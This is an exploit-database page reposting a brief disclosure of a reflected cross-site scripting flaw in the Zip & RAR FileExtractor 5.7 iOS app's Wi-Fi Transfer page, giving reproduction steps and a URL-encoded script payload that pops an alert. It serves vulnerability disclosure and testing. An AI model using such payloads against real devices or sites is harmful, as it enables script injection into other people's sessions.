Zip And RAR FileExtractor 5.7 Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 N/A Medium
Author Risk Exploitation Type Date
Unknown Medium Remote 2023-06-30
Our sensors found this exploit at:

Below is a copy:

Zip And RAR FileExtractor 5.7 Cross Site Scripting
# Exploit Title: Zip & RAR FileExtractor  v5.7 - Reflected XSS
# Vendor Homepage: Penghui Zhao
# Software Link:
# Date: 2023-06-20
# Exploit Author: tmrswrr
# Category : ios app
# Version: v5.7
# Tested on: Windows/Linux

## Description:

>> Go to Wi-Fi Transfer section in zip rar file extractor app
>> It will be create link :
>> When open link your browser , write payload, xss payload execute page and see alert button

Payload: %22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.